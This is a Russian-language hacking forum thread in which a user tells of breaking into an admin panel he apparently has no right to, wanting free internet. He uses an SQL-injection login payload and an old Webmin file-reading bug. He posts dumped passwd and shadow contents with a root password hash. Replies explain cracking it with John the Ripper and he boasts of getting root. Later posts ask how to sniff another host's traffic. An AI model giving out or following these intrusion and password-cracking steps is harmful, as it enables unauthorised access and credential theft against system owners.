В функциях copy() и move_uploaded_file() null-байт работает, если же он экранируется, то можно воспользоваться тем, что php проводит нормализацию пути и обрезает значение по превышении MAXPATHLEN:

__________________
<? Raz0r.name — блог о web-безопасности

Не знаю, тут ли постю. Если что - прошу прощения. Ранее получал доступ в админку по линку http://192.168.0.1. В логин или пароль (1' or 1=1/*) и получил права. Спалили, поменяли. Поставил админ WEBMIN. Приконектився к 10000 порту. Скуль не проходит. Нарыл такую вот штуку показывает это (урывок): root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

И такую: Показывает такое (урывок):
root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7:::
bin:*:14346:0:99999:7:::
daemon:*:14346:0:99999:7:::
adm:*:14346:0:99999:7:::
lp:*:14346:0:99999:7:::
sync:*:14346:0:99999:7:::
shutdown:*:14346:0:99999:7:::
halt:*:14346:0:99999:7:::
mail:*:14346:0:99999:7:::
news:*:14346:0:99999:7:::
uucp:*:14346:0:99999:7:::

Можно логин-пароль найти в этих данных?

->
Интересный, кстати говоря, случай.
Чтобы расшифровать пароля рута используй JohnTheRipper
--
Баг оказался древним
http://www.fduran.com/blog/webmin-vulnerability-exposing-your-password-or-any-file/

__________________
<? Raz0r.name — блог о web-безопасности

JohnTheRipper для *nix. Для винды тоже есть, только как им пользоваться ... просцу. Подскажите, что это за хеш? Какой алг его расшифровки. И где логин? ( Если туплю, сорри. Я не хакер, я просто бесплатного интернета хочу. Потому прошу помощи)

Нашел руководство по JohnTheRipper. Теперь проблема в другом.
JTR нужно кормить файлом с содержимым
root:6xp8Tw7//32x2:0:0:root:/:/bin/bash
А у меня содержимое в shadow
root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7:::
А в passwd:
root:x:0:0:root:/root:/bin/bash

Западло. Что делать?

Всем спасибо. Может кому пригодится: получил root скриптом Админ продолжает сосать)))

Хеш: FreeBSD MD5
Логин: Root
На счёт алгоритма в google поищи.
------------
Просто скопируй root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7::: в файл shadow
и переберай джоником ./john shadow

Сорри, не пропустил последний пост )

Подскажите пожалуста, возможно ли проснифать трафик хоста например 192.168.2.1 c машины с адресом 192.168.1.1 разделлённые маршрутизатороми, если хост 192.168.1.1 физически соединён только с маршрутизатором, и в ARP таблици только адрес этого маррутизатора?

Не, ну шутки шутками. Объясните мне пожалуйста, почему меня пустило в админку введением одного логина: root. Поле пароля пустое. Это недоработка webmina? Или я чтото сделал своими слабенькими манипуляциями?